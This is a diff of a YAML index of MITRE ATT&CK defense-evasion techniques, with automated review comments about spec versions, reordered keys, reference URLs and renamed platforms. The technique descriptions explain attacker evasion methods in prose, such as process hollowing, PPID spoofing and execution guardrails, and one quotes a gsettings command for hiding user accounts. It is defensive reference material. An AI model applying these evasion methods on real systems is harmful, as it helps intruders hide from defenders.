+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
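Review bot: the Deloitte Environment Awareness reference gains an `/edit` suffix (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) along with the updated retrieval date; on Google Drive the `/edit` path is the editor view, so confirm the link still opens for an unauthenticated reader, since a reference only the document owner can open is not useful as a citation. The rest of the hunk is the same delete-and-re-emit reordering seen elsewhere in this file (type, id, created and external_references moved to the bottom), with `revoked: false` added.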
@@ -8136,7 +8241,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8174,68 +8279,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
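Review bot: `spec_version: '2.1'` is dropped from T1480 (and from every technique block in this file) without a replacement, while `x_mitre_attack_spec_version` goes from `2.1.0` to `3.2.0`. `spec_version` is a required property on STIX 2.1 domain objects, so any consumer that validates these `technique` blocks as STIX will now reject them; this is a file-wide schema change and deserves an explicit call-out in the PR description. Two smaller points in the same hunk: for T1218.005 at the top of the hunk both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed with nothing added in their place, so that object may end up with no spec version at all; and the rest of the hunk is almost entirely key reordering (`name`, `description`, `kill_chain_phases`, `external_references` entries and their `url`/`external_id` keys all move) rather than content, which makes the substantive additions (the new user-agent paragraph, the `Trellix-Qakbot` reference, `x_mitre_version` 1.1 to 1.2) hard to spot. Emitting keys in a stable order from the generator would keep future diffs reviewable.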
@@ -8293,7 +8402,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -8319,7 +8427,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8344,8 +8452,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
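Review bot: for T1205.001 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and no `x_mitre_attack_spec_version` is added back in this hunk, whereas T1480 above has its value bumped to `3.2.0`. The same remove-without-replace pattern appears for T1574.013, T1542.004, T1601, T1036.001 and T1564.006 further down. Please confirm these objects still carry an `x_mitre_attack_spec_version` elsewhere in their block, or they will be the only techniques in the file with no spec version, which any "which ATT&CK spec is this" logic will then have to special-case.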
@@ -8406,7 +8512,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8479,7 +8584,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8508,7 +8613,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8572,11 +8676,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8661,12 +8764,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8741,45 +8843,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -8803,6 +8870,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8813,9 +8883,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8825,8 +8900,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
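Review bot: the `Deloitte Environment Awareness` reference URL changes from `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to the same id with an `/edit` suffix, with the retrieval date moved to September 13, 2024. Google Drive share links are not an archival source and the `/edit` form may behave differently from the bare file link for unauthenticated readers, so please verify the new URL resolves without a Google account before merging. Also note that the `external_references` list is emitted in reverse order relative to the removed block at the top of the object, and `x_mitre_version` stays at `'1.1'` while `modified` moves to `2024-09-12`; that is consistent with a reference-only update, but worth stating so nobody expects a version bump.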
@@ -8883,7 +8985,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -8908,7 +9010,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -8979,7 +9080,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -9006,11 +9107,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -9064,7 +9164,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -9100,7 +9199,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -9126,8 +9225,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -9153,7 +9250,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9175,8 +9272,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9242,12 +9337,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9302,7 +9396,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9450,7 +9543,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests: []
T1601:
@@ -9477,7 +9569,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9512,8 +9604,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9579,7 +9669,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9605,7 +9694,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9630,11 +9719,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9651,7 +9739,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9661,7 +9748,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9670,19 +9757,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
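Review bot: the `x_mitre_platforms` list for T1078 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, with `x_mitre_version` going from `'2.6'` to `'2.7'`. Any index generator, filter or test-selection logic in this repo that matches on the old platform strings will silently stop matching this technique, so please check the per-platform index generation and record the old-to-new platform mapping in the PR description. The removal of `x_mitre_modified_by_ref` here is only a move (it is re-added at the end of the object alongside `x_mitre_attack_spec_version: 3.2.0`), so that part is fine.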
@@ -9730,11 +9815,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9802,18 +9888,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
